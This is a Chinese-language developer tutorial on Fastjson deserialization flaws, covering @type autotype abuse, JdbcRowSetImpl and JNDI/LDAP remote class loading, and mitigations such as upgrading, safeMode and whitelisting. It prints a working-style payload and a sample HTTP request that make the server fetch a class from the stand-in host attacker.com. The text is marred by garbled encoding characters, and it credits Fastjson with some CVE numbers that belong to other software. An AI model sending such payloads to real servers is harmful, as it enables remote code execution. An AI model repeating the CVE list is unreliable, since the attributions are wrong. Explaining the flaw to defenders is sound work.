前幾天一位安服朋友提到很多開發(fā)團隊對 Fastjson 漏洞的理解還停留在 "知道有風險但不清楚為什么" 的層面�。尤其是 Java 開發(fā)團隊�����,因為 Fastjson 在國內(nèi)項目中使用非常廣泛�����,一旦出問題影響極大���。今天就專門給開發(fā)工程師們講講 Fastjson 漏洞的來龍去脈�����。
先說說 Fastjson 是什么
Fastjson 是阿里巴巴開發(fā)的一款 Java JSON 解析庫��,常見于 Java Web 應(yīng)用或移動服務(wù)端���,很多項目都在 Maven 或 Gradle 中直接引用它?!?/span>
它的核心功能就是:
- 將 Java 對象轉(zhuǎn)換成 JSON 字符串(序列化)
- 將 JSON 字符串轉(zhuǎn)換成 Java 對象(反序列化)
Fastjson 漏洞的核心問題:反序列化風險
Fastjson 的主要漏洞集中在反序列化過程中,具體涉及 CVE-2017-18349�����、CVE-2020-2883�����、CVE-2021-21351 等多個漏洞編號,本質(zhì)都是惡意構(gòu)造的 JSON 字符串被解析時�,觸發(fā)了危險類的方法執(zhí)行。
先理解什么是反序列化
正常情況下��,反序列化是個很有用的功能:
- 客戶端發(fā)送 JSON 字符串:
{"name":"張三","age":20} 服務(wù)器用 Fastjson 把它轉(zhuǎn)成 Java 對象:User{name='張三', age=20}
但問題在于���,F(xiàn)astjson 為了方便用戶使用�,支持一種特殊語法:通過@type字段指定要反序列化的類���。
比如:{"@type":"com.example.User","name":"張三","age":20}
這會明確告訴 Fastjson:" 請把我轉(zhuǎn)成com.example.User類的對象 "�。
漏洞原理:惡意類的利用
攻擊者發(fā)現(xiàn)����,如果在@type里指定系統(tǒng)中已存在的危險類�,并構(gòu)造特定參數(shù),就能觸發(fā)這些類的危險方法��。
以最經(jīng)典的利用為例:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit","autoCommit":true}
- 識別
@type指定的JdbcRowSetImpl類 - 調(diào)用該類的
setDataSourceName方法�����,傳入惡意 LDAP 地址 - 調(diào)用
setAutoCommit方法時,會觸發(fā)JdbcRowSetImpl內(nèi)部的 JNDI lookup 操作 - 服務(wù)器會向
attacker.com發(fā)起 LDAP 請求�,下載惡意類
漏洞的關(guān)鍵原因
- 對
@type字段的危險類沒有限制 - 自動調(diào)用 setter 方法的機制:Fastjson 在反序列化時會自動調(diào)用對應(yīng)屬性的 setter 方法,可能觸發(fā)危險操作
- 與 JNDI 的結(jié)合
:當被反序列化的類(如JdbcRowSetImpl)包含 JNDI lookup 功能時��,就會形成遠程代碼執(zhí)行鏈
哪些情況有風險���?
- 使用 Fastjson 解析不可信來源的 JSON 數(shù)據(jù)(如用戶輸入���、網(wǎng)絡(luò)請求)
- Fastjson 版本低于安全版本(不同漏洞對應(yīng)的安全版本不同,如
1.2.83修復(fù)了多個高危漏洞) 項目中存在可被利用的 "gadget 類"(即包含危險方法的類����,如JdbcRowSetImpl、TemplatesImpl等)
簡單的圖示:
惡意JSON --> Fastjson解析 --> 識別@type --> 調(diào)用危險類 --> 加載遠程類 --> 代碼執(zhí)行
舉個實際攻擊場景
- 構(gòu)造惡意請求
POST/api/user?HTTP/1.1Host:vulnerable.comContent-Type:application/json
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/poc","autoCommit":true}
2. 服務(wù)器處理流程:
3. 攻擊結(jié)果:服務(wù)器從攻擊者的 LDAP 服務(wù)器加載惡意類,執(zhí)行后攻擊者獲得服務(wù)器控制權(quán)
給開發(fā)者的終極建議:
強制升級:Fastjson ≥?1.2.83(修復(fù)了多數(shù)高危漏洞)���。
開啟安全模式:
ParserConfig.getGlobalInstance().setSafeMode(true);?
3.白名單控制(若必須用?@type):
ParserConfig.getGlobalInstance().addAccept("com.trusted.package.");
4.永不解析不可信 JSON
用戶輸入需嚴格校驗 + 過濾?@type?字段�。
關(guān)鍵認知:Fastjson 漏洞本質(zhì)是?Java 反序列化通病的體現(xiàn)(如 Apache Commons Collections����、Jackson 也曾有類似問題)。安全取決于配置��,而非庫本身。
?開發(fā)者需建立深度防御思維�。
記住:任何解析外部數(shù)據(jù)的功能都可能成為攻擊入口����,必須保持警惕。
該文章在 2025/7/23 11:53:58 編輯過
400 186 1886
